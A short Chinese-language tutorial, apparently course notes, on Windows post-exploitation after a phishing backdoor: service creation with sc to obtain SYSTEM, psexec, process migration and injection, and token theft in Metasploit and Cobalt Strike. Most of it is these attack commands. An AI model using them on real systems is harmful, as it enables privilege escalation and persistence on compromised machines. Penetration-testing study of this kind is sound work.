应用场景
1、常规某个机器被钓鱼后门攻击后,我们需要做更高权限操作或权限维持等
2、内网域中某个机器被钓鱼后门攻击后,我们需要对后续内网域做安全测试
服务启动
sc是用于与服务控制管理器和服务进行通信的命令行程序。
适用版本:windows 7、10、08、12、16、19、22,早期用 at 命令
1、创建一个名叫 syscmd的执行文件服务
sc Create syscmd binPath= "c:\msf.exe"
2、运行服务
sc start syscmd
创建服务命令
运行服务–上线system
直接运行后门–上线administrator
远程控制
https://docs.microsoft.com/zh-cn/sysinternals/downloads/pstoolspsexec.exe -accepteula -s -i-d cmd #调用运行cmd
进程注入(降权&提权)
从一个进程用户,把进程注入到另一个进程中,高权限到低权限(降权)或低权限到高权限(提权)
MSF:
ps //查看进程
migrate PID //迁移对应PID
提权
CS :
ps //查看进程
inject PID //注入对应PID
图形化
命令行
ps获取进程
刚刚没有成功 msf占用了进程
降权
令牌窃取(降权&提权)
MSF :
use incognito #使用该模块
list_tokens -u #能窃取的令牌
impersonate_token "NT AUTHORITY\SYSTEM" #执行窃取
CS :
ps //查看进程
steal_token PID //窃取进程令牌
spawnu PID //窃取进程令牌上线
降权
msf–getsystem–自动提权
总结
